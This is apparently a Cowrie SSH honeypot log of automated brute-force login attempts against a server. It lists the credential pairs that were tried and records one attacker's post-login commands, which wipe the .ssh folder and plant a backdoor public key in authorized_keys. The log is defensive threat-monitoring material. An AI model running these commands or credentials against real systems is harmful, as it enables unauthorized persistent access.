{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:26.802275Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":53724,"dst_ip":"1.2.3.4","dst_port":22,"session":"ceca8c581fa1","protocol":"ssh","message":"New connection: 43.159.36.188:53724 (1.2.3.4:22) [session: ceca8c581fa1]","sensor":"my-vps","timestamp":"2025-08-31T05:54:27.046356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:54:27.048331Z","src_ip":"43.159.36.188","session":"ceca8c581fa1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:54:27.293272Z","src_ip":"43.159.36.188","session":"ceca8c581fa1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:54:28.276584Z","src_ip":"43.159.36.188","session":"ceca8c581fa1"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:54:29.164873Z","src_ip":"212.227.235.229","session":"a04db894c470"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:29.524506Z","src_ip":"43.159.36.188","session":"ceca8c581fa1"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":53726,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab3920df6439","protocol":"ssh","message":"New connection: 43.159.36.188:53726 (1.2.3.4:22) [session: ab3920df6439]","sensor":"my-vps","timestamp":"2025-08-31T05:54:29.768337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:54:29.769998Z","src_ip":"43.159.36.188","session":"ab3920df6439"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:54:30.014907Z","src_ip":"43.159.36.188","session":"ab3920df6439"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45794,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d10d8ddce82","protocol":"ssh","message":"New connection: 212.227.235.229:45794 (1.2.3.4:22) [session: 2d10d8ddce82]","sensor":"my-vps","timestamp":"2025-08-31T05:54:30.993139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:54:30.994334Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:54:30.995994Z","src_ip":"43.159.36.188","session":"ab3920df6439"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:31.243975Z","src_ip":"43.159.36.188","session":"afd3ccc0641a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:31.244878Z","src_ip":"43.159.36.188","session":"ab3920df6439"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:54:31.276798Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.login.failed","username":"test2","password":"abc123","message":"login attempt [test2/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:54:32.149558Z","src_ip":"212.227.235.229","session":"1b3905786d35"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei2023","message":"login attempt [root/Huawei2023] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:54:32.446701Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:54:33.031193Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:54:33.031935Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:54:33.033042Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:33.316272Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:54:34.372416Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:54:34.373101Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:34.375848Z","src_ip":"212.227.235.229","session":"1b3905786d35"}
{"eventid":"cowrie.session.closed","duration":"18.4","message":"Connection lost after 18.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:34.376656Z","src_ip":"212.227.235.229","session":"a04db894c470"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:54:34.657688Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:34.658711Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45806,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccf0600d845f","protocol":"ssh","message":"New connection: 212.227.235.229:45806 (1.2.3.4:22) [session: ccf0600d845f]","sensor":"my-vps","timestamp":"2025-08-31T05:54:34.942054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:54:34.942830Z","src_ip":"212.227.235.229","session":"ccf0600d845f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:54:35.226311Z","src_ip":"212.227.235.229","session":"ccf0600d845f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:54:36.399146Z","src_ip":"212.227.235.229","session":"ccf0600d845f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41076,"dst_ip":"1.2.3.4","dst_port":22,"session":"3af575804a52","protocol":"ssh","message":"New connection: 212.227.125.160:41076 (1.2.3.4:22) [session: 3af575804a52]","sensor":"my-vps","timestamp":"2025-08-31T05:54:37.372938Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:37.683407Z","src_ip":"212.227.235.229","session":"ccf0600d845f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45814,"dst_ip":"1.2.3.4","dst_port":22,"session":"93b214a14b91","protocol":"ssh","message":"New connection: 212.227.235.229:45814 (1.2.3.4:22) [session: 93b214a14b91]","sensor":"my-vps","timestamp":"2025-08-31T05:54:37.951296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:54:37.953070Z","src_ip":"212.227.235.229","session":"93b214a14b91"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:54:38.222074Z","src_ip":"212.227.235.229","session":"93b214a14b91"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:54:39.339226Z","src_ip":"212.227.235.229","session":"93b214a14b91"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:39.608324Z","src_ip":"212.227.235.229","session":"2d10d8ddce82"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:39.609670Z","src_ip":"212.227.235.229","session":"93b214a14b91"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:54:44.108214Z","src_ip":"212.227.125.160","session":"3af575804a52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:54:44.109032Z","src_ip":"212.227.125.160","session":"3af575804a52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53052,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d60ac3d0758","protocol":"ssh","message":"New connection: 212.227.235.229:53052 (1.2.3.4:22) [session: 0d60ac3d0758]","sensor":"my-vps","timestamp":"2025-08-31T05:54:44.308754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:54:44.310388Z","src_ip":"212.227.235.229","session":"0d60ac3d0758"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:54:44.594177Z","src_ip":"212.227.235.229","session":"0d60ac3d0758"}
{"eventid":"cowrie.login.failed","username":"will","password":"will","message":"login attempt [will/will] failed","sensor":"my-vps","timestamp":"2025-08-31T05:54:45.769867Z","src_ip":"212.227.235.229","session":"0d60ac3d0758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37262,"dst_ip":"1.2.3.4","dst_port":22,"session":"b02930d058d4","protocol":"ssh","message":"New connection: 212.227.125.160:37262 (1.2.3.4:22) [session: b02930d058d4]","sensor":"my-vps","timestamp":"2025-08-31T05:54:46.423010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:54:46.814576Z","src_ip":"212.227.125.160","session":"b02930d058d4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:54:46.815333Z","src_ip":"212.227.125.160","session":"b02930d058d4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:54:47.055537Z","src_ip":"212.227.235.229","session":"0d60ac3d0758"}
{"eventid":"cowrie.login.failed","username":"test2","password":"abc123","message":"login attempt [test2/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:54:48.245464Z","src_ip":"212.227.125.160","session":"b02930d058d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38448,"dst_ip":"1.2.3.4","dst_port":22,"session":"796b82e4ff52","protocol":"ssh","message":"New connection: 212.227.235.229:38448 (1.2.3.4:22) [session: 796b82e4ff52]","sensor":"my-vps","timestamp":"2025-08-31T05:54:48.888211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:54:48.889186Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
